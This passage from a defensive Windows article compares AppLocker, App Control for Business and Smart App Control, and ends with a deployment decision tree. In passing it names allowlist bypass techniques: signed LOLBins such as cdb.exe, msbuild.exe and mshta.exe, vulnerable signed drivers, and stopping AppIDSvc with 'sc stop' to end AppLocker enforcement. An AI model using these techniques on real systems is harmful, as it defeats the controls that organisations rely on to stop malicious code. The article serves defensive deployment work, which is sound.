The community corpus. Jimmy Bayne's bohops/UltimateWDACBypassList [@github-ultimatewdacbypass] preserves per-binary attribution to Forshaw, Smith, Nelson, Graeber, Moe, and others. Pair with the LOLBAS Project [@lolbas-project] as the cross-platform LOLBin catalogue and you have the empirical record the Recommended Block Rules canonicalise.

Microsoft's response was institutional, not architectural. Publish the inverse list and update it continuously. The Microsoft Recommended Block Rules policy is the canonical mitigation [@ms-appcontrol-bypass]. Snapshots of the page through 2019, 2020, 2022, and 2023 show a monotonically growing enumeration: a handful of entries at first, around forty by 2026, with each addition traceable to a named-researcher write-up.Matt Graeber's original 2016 cdb.exe write-up URL www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html now serves an unrelated 2011 NTFS-ADS post (also by Graeber, but pre-cdb-era). The verbatim August 2016 LOLBin post is preserved in the Wayback Machine [@exploit-monday-cdb-wayback]. The attribution is independently triangulated by the Microsoft Recommended Block Rules page itself ("Microsoft recognizes ... Matt Graeber") [@ms-appcontrol-bypass] and by bohops/UltimateWDACBypassList [@github-ultimatewdacbypass].

The article must state plainly: "App Control with the Recommended Block Rules" and "App Control without them" are not the same product. The block list is load-bearing.

DO NOT consider any application whitelisting solution to be secure against a bored member of staff. -- James Forshaw, *DG on Windows 10 S* [@tiraniddo-dg-2017]

Operational cost is non-zero. The webclnt.dll block in the Recommended Block Rules has a documented practitioner side effect. Peter Upfold's July 2024 write-up [@upfold-webclnt-word-hang] documents a 5-15 second Word "not responding" hang on OneDrive / SharePoint saves caused specifically by that block, on machines with App Control for Business enforcing the Microsoft Recommended Block Rules. The mitigation has a cost. Honest deployment means measuring the cost against the threat it addresses.

Peter Upfold reported in July 2024 [@upfold-webclnt-word-hang] that *"users were experiencing a 5-15 second delay when saving a document to OneDrive or SharePoint, during which Word would show as 'not responding.' All machines in question use App Control for Business (WDAC)."* The cause was the `webclnt.dll` entry in the Microsoft Recommended Block Rules, which blocks the WebDAV redirector. WebDAV is the underlying transport Office uses for some OneDrive / SharePoint save paths. The block exists because `webclnt.dll` has historically been used by attackers to coerce NTLM authentication to attacker-controlled UNC paths; the side effect is a Word hang on legitimate saves. This is the texture of *"App Control with the Recommended Block Rules"*: not theoretical, not free.

Tie back to the thesis. The bypass corpus does not undermine App Control's security-boundary status. It underlines that without the Recommended Block Rules, an App Control "allow all Microsoft-signed code" policy is not a coherent security policy. The boundary holds because Microsoft and the community continuously update the inverse list.

Note: The MSRC servicing-criteria classification of App Control as a security feature assumes the Recommended Block Rules are merged into the policy. An App Control deployment that allows Microsoft-signed code without the Block Rules is enforcement-of-a-name, not enforcement-of-a-capability. The single most-skipped step in production deployments is the merge of the Recommended Block Rules and the Vulnerable Driver Blocklist into the active policy.

If both AppLocker and App Control have structural ceilings, and Microsoft maintains them both, the question is not "which one is correct?" It is: what is Microsoft's third application-control product, who is it for, and how does it relate to the first two? That is Smart App Control.

9. Smart App Control -- The Adjacent Consumer Application

Windows 11 22H2 ships on September 20, 2022 [@blogs-windows-22h2-launch] [@ms-lifecycle-win11-enterprise]. Microsoft introduces Smart App Control (SAC) for consumer Windows. It runs on the same kernel CI machinery as App Control for Business [@ms-smart-app-control]. It is not App Control for Business. Why is it a distinct product?

The mechanism. SAC uses the same ci.dll evaluator as App Control for Business. Its decision source is ISG, with a fallback to "valid signature from a Trusted Root CA" when ISG has no verdict [@ms-smart-app-control]. On an eligible clean install of Windows 11 22H2 or later, SAC starts in evaluation mode and either moves to enforcement or turns itself off, depending on whether Microsoft assesses the device as a good fit.

The product is categorically different.

Unmanaged: no admin policy, no GPO, no Intune authoring surface.
All-or-nothing: there is no per-app rule list. Either SAC is on for the device, or it is off.
Auto-disables silently: when the device's telemetry suggests SAC would be disruptive, it can disable itself without prompting the user [@ms-smart-app-control].
Enterprise-managed devices keep it off: SAC stays off if "your device is enterprise-managed or developer-mode has been configured" [@ms-support-sac-faq].

A consumer-grade Windows 11 application-control feature that uses the same kernel CI evaluator as App Control for Business but provides no policy authoring surface. SAC consults the Intelligent Security Graph for reputation and a Trusted Root CA signature fallback for unknown binaries. SAC is binary: on (enforcing for the device) or off. On eligible clean installs of Windows 11 22H2 and later for unmanaged consumer devices, it starts in evaluation mode and then turns on or off [@ms-smart-app-control] [@ms-support-sac-faq].

The 2026 update most older write-ups still get wrong. SAC can be re-enabled without a clean install on current Windows versions. The Microsoft Support FAQ [@ms-support-sac-faq] states: "Recent Windows updates allow Smart App Control to be enabled within the Windows Security App without requiring a clean installation" and "Recent Windows updates allow Smart App Control to be re-enabled without requiring a clean installation." If you read a blog post that claims SAC requires a Windows 11 reinstall to enable, that post pre-dates these updates. The current SAC state-machine vocabulary is evaluation mode (not audit mode) [@ms-smart-app-control].

Note: The widely-cited 2022-era guidance that "to turn on Smart App Control, a Windows 11 reinstall is required" is no longer true [@ms-support-sac-faq]. Microsoft has shipped the in-place enable / re-enable surface in the Windows Security app. If your reading list still warns of the reinstall requirement, the warning is empirically outdated as of 2026.

The Microsoft documentation about SAC is itself inconsistent on this point. The Smart App Control overview developer page still says SAC "can only be enabled on a clean install of a version of Windows that contains the Smart App Control feature" and lists "A clean Windows install" as a SAC requirement [@ms-smart-app-control], while the Microsoft Support FAQ [@ms-support-sac-faq] documents the in-place re-enable surface. The FAQ is the more current source and is the one Microsoft updates when servicing changes the behaviour; the developer overview page lags. Practitioners reading the two pages back-to-back should treat the FAQ as authoritative for current Windows.

Why SAC is not "WDAC for consumers": the enforcement engine is approximately the same, but the product is categorically different. Unmanaged, all-or-nothing, ISG-gated, silently auto-disables. The kernel is the same; the management story is the inverse. The FAQ in section 15 flags this misconception explicitly.

Three products now sit in the inventory: AppLocker, App Control for Business, Smart App Control. The practitioner question is no longer "which one is best?" It is "which one fits which deployment?" That is the job of the next section.

10. Side-by-Side Comparison -- The Practitioner Matrix

Most comparisons of AppLocker and App Control are organised by feature inventory. That answers the wrong question. Organise the comparison by what the security practitioner actually needs to decide, and the line between the two becomes obvious.

Practitioner-decision dimension	AppLocker	App Control for Business
MSRC servicing-criteria classification	Defense-in-depth (not a security feature) [@ms-appcontrol-applocker-overview]	Security feature when signed policy and HVCI [@ms-appcontrol-applocker-overview]
Enforcement locus	User-mode `AppIDSvc` + kernel `AppID.sys` minifilter [@ms-applocker-architecture]	Kernel `ci.dll` (HVCI: VTL1) [@ms-hvci]
Survives `SYSTEM`-equivalent attacker	No -- `sc stop AppIDSvc` ends enforcement	Yes, when policy is signed and HVCI is on
Per-user / per-group rules	Yes [@ms-appcontrol-feature-availability]	No (whole-device) [@ms-appcontrol-feature-availability]
Driver coverage	No (drivers go through KMCS / DSE)	Yes -- App Control policy can govern drivers as a peer of KMCS
`.bat` / `.cmd` script enforcement	Yes [@ms-applocker-rules]	No -- script enforcement is host-cooperative and `cmd.exe` is not enlightened [@ms-appcontrol-script-enforcement] [@ms-appcontrol-feature-availability]
Signing infrastructure required	None	Internal code-signing PKI required for signed policy (the security-boundary configuration)
Reboot required to apply policy changes	No (immediate take-effect through AppIDSvc)	Yes for signed policies (because the trusted-signer set is sealed at boot)
GPO deployment	Mature dedicated UI	Single-policy XML through Administrative Templates -> System -> Device Guard
MDM / Intune deployment	AppLocker CSP (in maintenance) [@ms-applicationcontrol-csp]	ApplicationControl CSP (multi-policy, where new feature work lands) [@ms-applicationcontrol-csp] [@ms-intune-app-control]
Active feature development	None -- "isn't getting new feature improvements" [@ms-appcontrol-applocker-overview]	Yes -- multi-policy cap removed April 2024 [@ms-appcontrol-multi-policy], Server 2025 OSConfig integration [@techcommunity-osconfig-server-2025]
Canonical bypass corpus	Oddvar Moe `UltimateAppLockerByPassList` [@github-ultimateapplockerbypass]	Jimmy Bayne `bohops/UltimateWDACBypassList` [@github-ultimatewdacbypass]; Microsoft Recommended Block Rules [@ms-appcontrol-bypass]

The table does not say "AppLocker bad, App Control good." It says the two are non-substitutable. AppLocker gives you per-user policy on devices that do not have a code-signing PKI. App Control gives you a real security boundary on devices that do.

Every "App Control = Yes" row in the security-boundary direction is gated on the policy being signed and HVCI being on. Every "AppLocker = Yes" row in the per-user direction comes with the user-mode-service ceiling. The article repeats these gating conditions in the prose so the reader does not over-read the table.

flowchart TB subgraph Quad["Threat-model fit"] AL["AppLocker
per-user yes, admin-resistant no
(operational hygiene)"] AC["App Control for Business
per-user no, admin-resistant yes
(security boundary, when signed and HVCI)"] SAC["Smart App Control
per-user no, admin-resistant partial
(consumer, unmanaged)"] None["No allowlist
per-user no, admin-resistant no
(default Windows)"] end The comparison table is intentionally pitched at the practitioner-decision layer. It does not show audit-mode behaviour (both products support it), the specific Event Log IDs (AppLocker logs to `Microsoft-Windows-AppLocker/*`, App Control to `Microsoft-Windows-CodeIntegrity/*`), the reboot semantics for unsigned vs signed App Control policies (unsigned changes can take effect without reboot in some configurations; signed changes require a reboot to refresh the trusted signer set), or the specific PowerShell cmdlet inventory. These details matter operationally and are covered on Microsoft Learn [@ms-appcontrol-applocker-overview] [@ms-applicationcontrol-csp]; they do not change the decision shape and are excluded from the comparison for word budget.

Key idea: AppLocker and App Control for Business are non-substitutable. The line between them is not new vs old; it is per-user without PKI vs security boundary with PKI. A deployment that needs both -- per-user policy on some collections and a real security boundary on others -- runs both side by side, which is exactly the configuration Windows 11 24H2 supports.

The table makes the what explicit. The why both still ship is still left implicit. The next section makes the case explicit, including the load-bearing negative citation that AppLocker is not on Microsoft's deprecated-features page as of February 2026.

11. Why Both Still Ship -- and Why "AppLocker Is Deprecated" Is Folklore

A line that has circulated in community summaries since 2023: "AppLocker is being sunsetted, migrate to WDAC." Is that line true?

The load-bearing negative citation. As of the February 2, 2026 update of Microsoft Learn's Deprecated features in the Windows client page [@ms-deprecated-features], AppLocker is not on the list. The page enumerates features Microsoft has formally deprecated -- WMIC, PowerShell 2.0, NTLM, DirectAccess, Maps, EdgeHTML, Paint 3D, the LPR/LPD print services, the UWP Map control. AppLocker is not among them.

What Microsoft does say, taken verbatim from the App Control and AppLocker Overview page [@ms-appcontrol-applocker-overview]:

As established in §4, Microsoft's own servicing-criteria language disqualifies AppLocker as a security feature [@ms-appcontrol-applocker-overview]; the load-bearing point for this section is the second half of the same page.
"Although AppLocker continues to receive security fixes, it isn't getting new feature improvements."

Although AppLocker continues to receive security fixes, it isn't getting new feature improvements. -- Microsoft Learn, *App Control and AppLocker Overview* [@ms-appcontrol-applocker-overview]

The October 8, 2024 cumulative update KB5044288 (OS Build 25398.1189, Windows Server, version 23H2) confirms the "continues to receive security fixes" claim with a concrete servicing fix [@ms-kb-5044288]: the release notes specifically include "[AppLocker] Fixed: The rule collection enforcement mode is not overwritten when rules merge with a collection that has no rules. This occurs when the enforcement mode is set to 'Not Configured.'" The fix shipped on the Server SKU first; the AppLocker code path is shared, so the fix appears on the client SKUs through their parallel monthly servicing. AppLocker is in maintenance mode, not deprecation.

Five reasons AppLocker still ships in 2026.

Reason	Practitioner consequence	Source
Per-user rules	App Control is whole-device. Multi-user terminal-server, Citrix VDI, and education labs need per-user policy.	[@ms-appcontrol-feature-availability]
No signing infrastructure required	App Control's tamper-resistance story requires an internal code-signing PKI; AppLocker requires none.	[@ms-appcontrol-applocker-overview]
GPO ergonomics	AppLocker has a mature dedicated GPO UI; App Control GPO deployment is single-policy format only (multi-policy requires the `ApplicationControl` CSP).	[@ms-applicationcontrol-csp]
Installed base	Existing AppLocker deployments work; ripping them out for a different security model has migration cost without a forced trigger.	[@ms-appcontrol-applocker-overview]
Threat-model fit	Some organisations only need to keep end users from running random downloads -- the operational hygiene threat model. AppLocker fits that model and admits its scope.	[@ms-appcontrol-applocker-overview]

The first reason is the load-bearing one. The kernel ci.dll evaluator does not consult per-user token context as a policy input; the App Control policy is whole-device by design. Until that changes, any environment whose risk model depends on different rule sets for different user identities -- terminal servers, RDS hosts, Citrix VDI, education labs, kiosks shared by multiple users -- has to keep AppLocker even if every other dimension would point toward App Control.

The community-folklore correction. The "AppLocker is deprecated" line is not Microsoft's position. The Microsoft position is the comparative one in App Control and AppLocker Overview: App Control is the recommended security feature; AppLocker is the supported parallel option for the scenarios above. The strongest defensible characterisation of AppLocker's roadmap is "feature complete, not actively developed, continues to receive security fixes" -- not "deprecated." Microsoft's Deprecated features in the Windows client page reinforces this in an unexpected direction [@ms-deprecated-features]: when the page deprecated Microsoft Defender Application Guard for Office, it recommended transitioning to "Microsoft Defender for Endpoint attack surface reduction rules along with Protected View and Windows Defender Application Control" -- a Microsoft-curated recommendation that names App Control as the forward-looking layer, not the legacy one.The KB5044288 October 2024 fix [@ms-kb-5044288] is the concrete proof-point that the "security fixes" claim is observable. It addresses a specific AppLocker rule-merge bug. A genuinely deprecated feature does not get bug fixes shipped on Patch Tuesday two years after rename.

Note: The phrase frequently appears in community summaries, conference slides, and migration-vendor sales decks. It is not in Microsoft Learn. AppLocker is not on the deprecated-features list [@ms-deprecated-features] as of February 2026, it continues to receive security fixes [@ms-kb-5044288], and Microsoft Learn explicitly preserves it for the scenarios where App Control is not a substitute [@ms-appcontrol-applocker-overview]. If your migration plan rests on the assumption that AppLocker will be removed soon, the assumption does not have a public Microsoft commitment behind it.

If both still ship, the natural next question is not which one to use today but where the ceiling for any allowlist mechanism is. That ceiling is structural, it is the same for AppLocker, App Control, and SAC, and the research community has named it.

12. Theoretical Limits -- What No Allowlist Can Do

The publisher-gate structural limit shown in section 8 was specific to App Control. Here is the more general version of the same observation: application control cannot evaluate side effects. The same ceiling applies to AppLocker, App Control, SAC, ISG, every Microsoft Recommended Block Rules iteration, and every third-party product in the same market.

The structural claim is folklore-level but universally observed; no published impossibility theorem yet states it formally. The closest standard result is Rice's theorem: any non-trivial behavioural property of a Turing-complete program is undecidable in the general case. A publisher-gate allowlist asks a behavioural question -- "will this binary do something that violates policy?" -- and answers it with a structural fact -- "who signed it?" The mismatch is not a defect of any individual allowlist product; it is a working bound the field treats as a corollary of Rice. The policy evaluator runs before the binary starts. It knows what the binary is -- the signer subject, the file hash, the path on disk, the Authenticode metadata. It does not know what the binary will do. If msbuild.exe is signed by Microsoft and the policy allows Microsoft-signed binaries, the policy has no way to know that msbuild.exe will then read an attacker-controlled .csproj file containing an inline <Task> element and compile and execute the attached C# at runtime.

This is the structural reason Microsoft publishes the Recommended Block Rules [@ms-appcontrol-bypass]. It is also the structural reason "allow all Microsoft-signed code" is not a security policy -- it is a starting point.

As established in §4 and §8, the bound is observed from both sides of the asymmetric arms race. External offensive research arrives at the "bored member of staff" framing in the Windows 10 S analysis [@tiraniddo-dg-2017]; the Microsoft-employed authors of the canonical deployment baseline arrive at the "determined user with administrative rights" framing in the AaronLocker README [@github-aaronlocker]. Two independent perspectives, the same ceiling stated in their own vocabularies. §12's contribution is not to re-quote either; it is to name the structural reason both arrive at the same place.

Key idea: The publisher-gate ceiling is not an artefact of AppLocker's user-mode design or App Control's kernel-but-publisher design. The ceiling is a property of the allowlist model whose allow signal is "this code is from a publisher I trust" instead of "this code's runtime behaviour matches a trusted policy." Closing the ceiling would require policy-time content semantics, which no Microsoft-shipped mechanism provides today.

The folklore claim *"a publisher-gate allowlist cannot evaluate side effects"* does not have a published formal impossibility result in the cryptography or program-analysis literature. Rice's theorem supplies the necessary-condition argument used above -- any non-trivial behavioural property of programs is undecidable in the general case -- but a tighter result calibrated to publisher-gate allowlists would have to constrain the adversary model (for example, bound the candidate input space or restrict the binary's capability surface) before any positive decidability claim becomes possible. The application-control literature has not crossed that bar; this article does not either.

If the ceiling is structural, what is the research community actively trying that might push it upward? Microsoft is not the only player; the field has named open problems.

13. Open Problems and Active Research

Seven open problems the field has named but not closed. The most honest framing is: each one has a Microsoft partial-mitigation, none has a clean solution. Each is treated below with the problem statement, the empirical or architectural evidence, the current Microsoft (and where relevant, regulatory) mitigation, and the residual gap.

1. Continuous catch-up against new Microsoft-signed LOLBins. Every new signed binary that takes a "run code from this file" argument is a candidate addition to the Recommended Block Rules [@ms-appcontrol-bypass]. The list is by construction monotonic and never complete. The empirical evidence is the lag between a LOLBin's public disclosure and its appearance on the Microsoft page, observable in Wayback Machine snapshots of the page. Three case studies bracket the lag range. Matt Graeber's August 2016 cdb.exe shellcode-runner write-up [@exploit-monday-cdb-wayback] appears on the recommended-block-rules page in the months that followed. Jimmy Bayne's August 2019 dotnet.exe write-up [@bohops-dotnet-awl] appears in a batch of additions roughly a year later. Peter Upfold's mid-2024 webclnt.dll-via-Word issue [@upfold-webclnt-word-hang] was a hang, not a LOLBin, but the WebDAV / WebClient surface had appeared in the page revisions of the prior couple of years. The case studies suggest a working practitioner bound: lags between a public LOLBin disclosure and a corresponding entry on the Microsoft Recommended Block Rules page range from several months to over a year, with longer tails for less load-bearing additions. A practitioner planning App Control deployments should not wait for the Microsoft page to catch up; merge community lists (LOLBAS [@lolbas-project], bohops/UltimateWDACBypassList [@github-ultimatewdacbypass]) into your own enforcement explicitly. The open research question is whether a binary's capability surface -- does it load arbitrary code? does it invoke a script host? -- can be inferred at scale, so the block list is generated rather than curated. Static analysis identifies some signals (a binary that imports LoadLibrary and GetProcAddress is at minimum suspect), but no Microsoft-shipped tool does this automatically across the signed-binary surface.

2. Signed-but-vulnerable drivers (BYOVD). WHQL-signed drivers with kernel-mode vulnerabilities remain App Control's hardest residual class. Microsoft layers three distinct mitigations against this class, each at a different point in the load path. Load-time: the Vulnerable Driver Blocklist [@ms-driver-block-rules] is a policy fragment enforced by ci.dll at every driver-load callback; the page itself admits the constraint plainly with "the vulnerable driver blocklist isn't guaranteed to block every driver found to have vulnerabilities." Write-time: the Defender for Endpoint Attack Surface Reduction rule "Block abuse of exploited vulnerable signed drivers" [@ms-asr-rules-reference] intercepts an attempt to write a known-bad signed driver to disk, blocking the deployment step rather than the load step. Post-load: HVCI (memory integrity) [@ms-hvci] [@ms-support-memory-integrity] running in VTL1 ensures that a driver that does load -- whether through a gap in the blocklist or because the device is not enrolled in ASR -- cannot grant attacker-controlled code write access to kernel memory or unsigned execution capability. The three layers compose: ASR is the perimeter, the blocklist is the gate, HVCI is the post-load containment.

flowchart TD Attacker["Attacker with admin
brings vulnerable signed driver"] L1["Write-time ASR rule
Block abuse of exploited
vulnerable signed drivers"] L2["Load-time Vulnerable
Driver Blocklist
(ci.dll, kernel)"] L3["Post-load HVCI
(VTL1, secure kernel)"] Bypass["Residual: driver not on
blocklist + ASR disabled
+ HVCI off or vulnerability
HVCI does not contain"] Attacker --> L1 L1 -- if not blocked --> L2 L2 -- if not blocked --> L3 L3 -- if not contained --> Bypass

The Microsoft-recommended driver blocklist is published in two physical forms. The version baked into Windows ships through monthly Windows Update servicing. A separately downloadable XML at aka.ms/VulnerableDriverBlockList is updated on its own cadence and is usually more complete than the version in-box on a given Patch Tuesday. The companion Driver Signing article in this pipeline covers KMCS, DSE, and the BYOVD class in depth; this section's BYOVD treatment is intentionally scoped to App Control's layered-mitigation role.

3. Cloud-evaluated allow decisions (ISG, SAC). The decision authority for "is this binary allowed?" is moving off-device to Microsoft's reputation services. Latency, offline-mode behaviour, and policy-transparency consequences are open practitioner concerns. Known good reputation can lag for newly-signed binaries; unknown defaults can disrupt legitimate workflows; the verdict itself is opaque to the organisation deploying the policy. The mechanism is documented [@ms-appcontrol-isg]; the operational implications continue to be discovered in production. The regulatory framing is the sharpest published constraint: the Australian Cyber Security Centre's Implementing application control page [@acsc-essential-eight-appcontrol] is unambiguous that cloud-reputation-driven decisioning, by itself, does not qualify as application control under the Essential Eight maturity model.

The ACSC lists "checking the reputation of an application using a cloud-based service before it is executed" among the practices under the heading "What application control is not." -- Australian Cyber Security Centre, *Implementing application control* [@acsc-essential-eight-appcontrol]

NIST SP 800-167 [@nist-sp-800-167] uses gentler language but arrives at the same operational conclusion: cloud-evaluated reputation is an additive signal, not an authoritative one. The practitioner consequence: an App Control policy that relies on ISG for its allow decisions in a regulated cardholder, classified, or critical-infrastructure environment will be flagged by both regimes. ISG and SAC remain useful additive signals; they do not substitute for an explicit allow policy authored and signed on-premises.

4. AI-assisted policy generation. AaronLocker [@github-aaronlocker] [@github-aaronlocker-script] is the canonical example of a heuristic generator -- it builds "audit" and "enforce" rule sets from observed telemetry, with explicit user-writeability pruning via Sysinternals AccessChk [@ms-accesschk]. ML-assisted variants are an active third-party space. The article is honest about not inventing specific Microsoft features that do not exist; the "ITL" fabrication is the failure mode this avoids. The honest 2026 status of generative policy authoring inside Microsoft's own tooling is that Microsoft has shipped a Security-Copilot-powered Policy Configuration Agent for Intune, scoped to the settings catalog (device-configuration profiles), with no App-Control-specific surface.

Note: The Security-Copilot-powered Policy Configuration Agent in Microsoft Intune [@ms-intune-policy-configuration-agent] [@ms-intune-manage-policy-configuration-agent] assists administrators with settings catalog policies. The agent's role requirement is the Intune Policy and Profile manager RBAC role; the surface it operates on is device-configuration profiles, not App Control XML. The Intune Copilot agent overview [@ms-intune-copilot-overview] confirms the inventory of shipped agents and does not include an App-Control-authoring agent. The article does not assert that Microsoft has shipped end-to-end generative App Control policy authoring because, as of June 2026, Microsoft has not. The closest production workflow is the audit-mode-then-merge loop in ConfigCI, and the closest automatic allow-listing signal is Intune-Management-Extension-as-managed-installer.

5. Per-user without losing the kernel boundary. App Control is whole-device; this is section 11's reason number one for why AppLocker still ships. No public Microsoft roadmap addresses per-user rules in App Control. Closing this would let App Control fully replace AppLocker in VDI / Citrix / terminal-server scenarios. The kernel evaluator has no per-user-token context by design, and adding it without compromising the boundary's tamper-resistance is a non-trivial design problem: per-user policy would have to be authored, signed, and refreshed at logon time without admitting an attacker who can forge a token into authoring their own per-user allow rule.

6. .bat / .cmd script enforcement. AppLocker's Script collection covers them [@ms-applocker-rules]; App Control's script enforcement is host-cooperative [@ms-appcontrol-script-enforcement] and cmd.exe is not an enlightened host. This is a documented gap [@ms-appcontrol-feature-availability] that has persisted since launch. Microsoft Learn is unusually direct about what the limitation actually means and what the recommended mitigation is.

App Control doesn't directly control code run via the Windows Command Processor (cmd.exe), including .bat/.cmd script files. However, anything that such a batch script tries to run is subject to App Control control. If you don't need to run cmd.exe, it's recommended to block it outright or allow it only by exception based on the calling process. -- Microsoft Learn, *Script enforcement with App Control* [@ms-appcontrol-script-enforcement]

The architectural fix would require either cmd.exe enlightenment (a substantial change to a binary with three decades of behavioural compatibility) or a kernel-side script-execution hook that does not exist today. Until then, the recommended mitigation is the one Microsoft itself names: deny cmd.exe by default in the App Control policy and allow it by exception based on the calling process, or rely on AppLocker's Script collection on the same device in parallel for the .bat / .cmd workload.

7. AppLocker's end state. It is not deprecated [@ms-deprecated-features]; it is not actively developed [@ms-appcontrol-applocker-overview]; it continues to receive security fixes [@ms-kb-5044288]; and Microsoft Learn explicitly recommends the App Control / AppLocker pair as the substitute path for the now-deprecated Microsoft Defender Application Guard for Office [@ms-deprecated-features]. The article should not speculate about a deprecation date Microsoft has not announced. The open question is operational: when, if ever, will the practitioner reasons in section 11 (per-user, no-PKI, GPO ergonomics, installed base, threat-model fit) be obsolete? Until App Control gains per-user rules, the answer is not soon. The lifecycle-quantification evidence is unambiguous on the direction of travel: the negative citation on the deprecated-features page, the comparative-recommendation positive characterisation in App Control and AppLocker Overview, the KB5044288 Patch Tuesday servicing fix, and the AppLocker recommended as MDAG-substitution finding from the deprecated-features page itself all point the same way.

Note: The Microsoft-org-hosted WDAC-Toolkit repository [@github-wdac-toolkit] is the source repo for the App Control Wizard and the most reliable channel for App Control authoring-tool updates. The bohops UltimateWDACBypassList [@github-ultimatewdacbypass] is the canonical community corpus that feeds the Recommended Block Rules attribution chain. The LOLBAS Project [@lolbas-project] is the cross-platform LOLBin catalogue. For BYOVD, the Microsoft Vulnerable Driver Blocklist page [@ms-driver-block-rules] is the running mitigation index, with the downloadable XML at aka.ms/VulnerableDriverBlockList as the more-current sibling.

The structural ceiling is real and the research direction is open. Within the bounds that exist today, what should a 2026 practitioner actually do? That is a decision tree, not an essay.

14. The Practitioner Decision Tree -- Picking and Deploying in 2026

Five questions, in order. Answer them and you have a deployment plan.

1. Do you need per-user rules and you do not have a code-signing PKI? -> Deploy AppLocker. Use AaronLocker [@github-aaronlocker] [@github-aaronlocker-script] as the deployment-tooling baseline. AaronLocker's Create-Policies.ps1 runs Sysinternals AccessChk [@ms-accesschk] against %ProgramFiles% and %SystemRoot% to identify user-writable subdirectories and produce a thorough audit policy you tune from telemetry before flipping enforcement on.

2. Do you need a real security boundary against admin-equivalent attackers? -> Deploy App Control for Business with a signed policy (signed by your organisation's PKI, not by the publisher of any individual application) and HVCI on. Anything less and you do not have the configuration the MSRC servicing criteria treat as a security boundary.

3. Do you have a managed software distribution mechanism (Configuration Manager, Intune, Patch My PC, third-party tooling)? -> App Control for Business with Managed Installer enabled [@ms-appcontrol-managed-installer] [@ms-intune-app-control]. Tagging the deployment agent as a managed installer trust-propagates that agent's installs into the policy without requiring you to enumerate every binary it deploys.

4. Do you have a long tail of unmanaged user apps you cannot enumerate? -> App Control for Business with ISG enabled [@ms-appcontrol-isg]. But never as the only authorisation path for business-critical apps. ISG is additive, not authoritative.

5. Consumer or un-managed Windows 11 device? -> Smart App Control, if eligible [@ms-smart-app-control] [@ms-support-sac-faq]. Otherwise nothing.

flowchart TD Q1{"Need per-user rules and no PKI?"} Q2{"Need admin-resistant boundary?"} Q3{"Have managed software distribution?"} Q4{"Have long tail of unmanaged apps?"} Q5{"Consumer or unmanaged device?"} AL["AppLocker (with AaronLocker)"] ACSigned["App Control for Business
signed policy + HVCI"] ACMI["Add Managed Installer rule"] ACISG["Add ISG signal (additive)"] SAC["Smart App Control"] Nothing["No application control"] Q1 -- yes --> AL Q1 -- no --> Q2 Q2 -- yes --> ACSigned Q2 -- no --> Q5 ACSigned --> Q3 Q3 -- yes --> ACMI Q3 -- no --> Q4 ACMI --> Q4 Q4 -- yes --> ACISG Q4 -- no --> Done["Deployment complete"] ACISG --> Done Q5 -- consumer --> SAC Q5 -- enterprise unmanaged --> Nothing

The actual deployment knobs.

Scope	GPO node	PowerShell cmdlet inventory	CSP / MDM path
AppLocker	Computer Configuration -> Windows Settings -> Security Settings -> AppLocker	`Get-AppLockerPolicy`, `Set-AppLockerPolicy`, `Test-AppLockerPolicy`, `New-AppLockerPolicy`	AppLocker CSP (maintenance only) [@ms-applicationcontrol-csp]
App Control for Business	Computer Configuration -> Administrative Templates -> System -> Device Guard	`New-CIPolicy`, `Merge-CIPolicy`, `ConvertFrom-CIPolicy`, `Set-CIPolicySetting`, `Set-CIPolicyVersion`, `Add-SignerRule` (`ConfigCI` module)	ApplicationControl CSP [@ms-applicationcontrol-csp]; Intune endpoint security UX [@ms-intune-app-control]
App Control Wizard	n/a	Wraps `ConfigCI` cmdlets [@ms-appcontrol-wizard]	n/a (MSIX desktop app)
Server 2025 default policy	OSConfig PowerShell cmdlets [@techcommunity-osconfig-server-2025]	OSConfig	n/a

The Intune deployment surface is the ApplicationControl CSP [@ms-applicationcontrol-csp], not the older AppLocker CSP. Microsoft is explicit that new App Control feature work lands in ApplicationControl only. The Intune endpoint-security UX path [@ms-intune-app-control] sits on top of that CSP.

Note: The single most-skipped step in production App Control deployments is the merge of the Microsoft Recommended Block Rules [@ms-appcontrol-bypass] and the Vulnerable Driver Blocklist [@ms-driver-block-rules] into the active policy. Without them, "allow all Microsoft-signed code" admits cdb.exe, csi.exe, dnx.exe, msbuild.exe, mshta.exe, dotnet.exe, and the rest of the LOLBin catalogue. With them, you have the configuration the MSRC servicing criteria treat as a security boundary. The merge is two Merge-CIPolicy invocations and a redeploy.

Note: The App Control for Business GPO node is still labelled Device Guard in gpedit.msc, even on Windows 11 24H2. Microsoft Learn calls this out explicitly [@ms-appcontrol-applocker-overview]: "The terms 'Device Guard' and 'configurable code integrity' are no longer used with App Control except when deploying policies through Group Policy." The naming confusion is the GPO tree's, not yours.

{` // Pseudocode walk of the App Control authoring path. The real cmdlets // run in PowerShell on a Windows host with the ConfigCI module installed; // this is the logic so you can mentally simulate the flow.

const baseXml = NewCIPolicy({ scanPath: 'C:\\Windows', level: 'SignedVersion', fallback: ['Hash'], filePath: 'BasePolicy.xml', });

const blockRulesXml = downloadAndImport( 'recommended-block-rules-policy', );

const driverBlockXml = downloadAndImport( 'vulnerable-driver-blocklist', );

const merged = MergeCIPolicy({ inputs: [baseXml, blockRulesXml, driverBlockXml], output: 'Production.xml', });

SetCIPolicySetting({ provider: 'SiPolicy', key: 'PolicyInfo', valueName: 'Information', value: 'Contoso Production Policy v1', policyPath: merged, });

const binaryCip = ConvertFromCIPolicy({ inputXml: merged, binaryFilePath: 'Production.cip', });

// Sign Production.cip with the organisation's code-signing certificate // before dropping it into: // %SystemRoot%\\System32\\CodeIntegrity\\CiPolicies\\Active\\ // then reboot to seal the trusted signer set. console.log('Production policy authored and ready for signing'); `}

Regulatory anchors. NIST SP 800-167 [@nist-sp-800-167] on application allowlisting is the federal framing. The ACSC Essential Eight [@acsc-essential-eight-appcontrol] treats application control as one of eight baseline mitigations and is explicit that "the use of file names, package names or any other easily changed application attribute is not considered suitable as a method of application control" -- a structural exclusion that maps cleanly onto Authenticode-signer and hash rules but rules out an AppLocker policy built primarily on path. PCI DSS v4.0.1 [@pci-document-library] requires comparable controls for cardholder environments. The article does not work through any of them in depth; the citations are here so a practitioner can find their own compliance map.The Wayback-preserved 2017 Device Guard policy deployment guide [@ms-deploy-ci-wayback] is the canonical historical reference for the pre-1709 era, before the WDAC rename. Practitioners maintaining older infrastructure occasionally need it.

